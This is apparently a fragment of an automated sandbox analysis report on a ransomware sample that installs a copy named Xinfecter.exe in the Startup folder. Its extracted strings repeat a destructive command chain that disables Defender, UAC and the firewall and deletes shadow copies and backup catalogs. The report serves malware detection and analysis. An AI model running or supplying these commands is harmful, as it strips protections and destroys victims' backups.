Source: xKvkNk9SXR.exe | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic
Source: xKvkNk9SXR.exe, 00000000.00000003.2084365924.0000000000F69000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: xKvkNk9SXR.exe, 00000000.00000003.2071935535.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
Source: xKvkNk9SXR.exe, 00000000.00000003.2071935535.0000000000F6B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: xKvkNk9SXR.exe, 00000000.00000000.2052899804.0000000000A93000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
Source: xKvkNk9SXR.exe, 00000000.00000000.2052899804.0000000000A93000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: xKvkNk9SXR.exe, 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
Source: xKvkNk9SXR.exe, 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: xKvkNk9SXR.exe, 00000000.00000002.3297094059.0000000000F3F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: vssadmin.exe Delete Shadows /A8
Source: Xinfecter.exe | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic
Source: Xinfecter.exe, 0000002A.00000002.2188876934.0000000000683000.00000002.00000001.01000000.00000008.sdmp | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
Source: Xinfecter.exe, 0000002A.00000002.2188876934.0000000000683000.00000002.00000001.01000000.00000008.sdmp | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: Xinfecter.exe, 0000002A.00000000.2187029003.0000000000683000.00000002.00000001.01000000.00000008.sdmp | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
Source: Xinfecter.exe, 0000002A.00000000.2187029003.0000000000683000.00000002.00000001.01000000.00000008.sdmp | Binary or memory string: vssadmin.exe Delete Shadows /All /Quiet
Source: xKvkNk9SXR.exe | Binary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: xKvkNk9SXR.exeBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: S-6748.bat.0.drBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
      Source: Xinfecter.exe.0.drBinary or memory string: reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
      Source: Xinfecter.exe.0.drBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet

      System Summary

      Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
      Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
      Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Windows\SysWOW64\systeminfo.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A3C860: CreateFileW, DeviceIoControl, CloseHandle
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File created: C:\Windows\SysMain.sys
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File created: C:\Windows\SysMain.sys
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009D4049
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009DC170
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009C4670
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009B92A0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009F0080
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A181A0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A24110
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A162EB
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009FA2C0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A442D4
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009C0239
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009C8240
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009C8380
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A023C0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A18440
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A1C7C5
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A16746
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A248D0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009CE830
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A6E90D
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009B8A80
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009C6AF7
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A46A58
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A80B04
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A24B70
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009F8E90
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009F0E00
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A48E4A
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A14FA7
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A14FB4
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A58FE0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A1CF3F
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009CAF50
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A012A0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A1D2C6
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A59252
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A1533B
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009F3300
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009B5330
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009F5400
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A6B47B
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A635A3
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A3F5F0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A595C4
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009CF570
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A1D557
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009F1630
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A637D2
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A5B817
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A23860
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A5986E
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A79879
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A1D990
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A29908
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009C9ABA
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009BDAB0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A43AE5
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009C5AC0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009CDAF0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009BBA60
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A59B35
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A71B71
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A15C84
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A69CD0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A23C70
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A59DF0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A15EA8
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009F3E80
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A67E46
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_00A17FA0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005C4049
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005B4670
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005CBD00
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005E0080
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00614110
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_006081A0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005B8240
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_006062EB
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005EA2C0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_006342D4
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005F23C0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005B8380
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00608440
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005B05AA
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00606746
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0060C7C5
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005BE830
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_006148D0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0065E90D
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005B69E0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00636A58
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005A8A80
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00614B70
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00670B04
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00638E4A
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005E0E00
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005E8E90
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005BAF50
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0060CF3F
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00648FE0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00604FA7
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00604FB4
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00649252
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0060D2C6
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005A92A0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005F12A0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0060533B
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005E3300
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005A5330
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005E5400
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005BF570
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0060D557
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0062F5F0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_006535A3
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005E1630
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_006537D2
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00613860
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00669879
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0064B817
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00619908
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_0060D990
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005ABA60
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00633AE5
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005B5AC0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005BDAF0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005B9ABA
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005ADAB0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00661B71
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005B1B7F
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00613C70
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00659CD0
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00605C84
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00605EA8
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_005E3E80
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: 42_2_00607FA0
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: String function: 009E80D0 appears 45 times
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: String function: 00A41B70 appears 70 times
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: String function: 009E9B40 appears 64 times
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: String function: 00A415B1 appears 82 times
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: String function: 009EB8D0 appears 48 times
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: String function: 009E1BD0 appears 68 times
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: String function: 00A40C3C appears 58 times
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: String function: 00A4157D appears 186 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: String function: 0063157D appears 164 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: String function: 005D1BD0 appears 68 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: String function: 005D9B40 appears 64 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: String function: 005D80D0 appears 34 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: String function: 00631B70 appears 60 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: String function: 005DB8D0 appears 48 times
      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe | Code function: String function: 006315B1 appears 63 times
      Source: xKvkNk9SXR.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engine | Classification label: mal100.rans.troj.adwa.evad.winEXE@116/22@1/2
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Code function: 0_2_009C5920: PathIsNetworkPathA, __alloca_probe_16, MultiByteToWideChar, GetDiskFreeSpaceExW
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3292:120:WilError_03
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:616:120:WilError_03
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7156:120:WilError_03
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_03
      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:736:120:WilError_03
      Source: C:\Users\user\Desktop\xKvkNk9SXR.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
      Source: xKvkNk9SXR.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="92"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="332"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="420"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="496"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="504"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="564"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="632"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="640"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="752"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="780"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="788"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="872"::GetOwner
      Source: C:\Windows\SysWOW64\cmd.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="924"::GetOwner
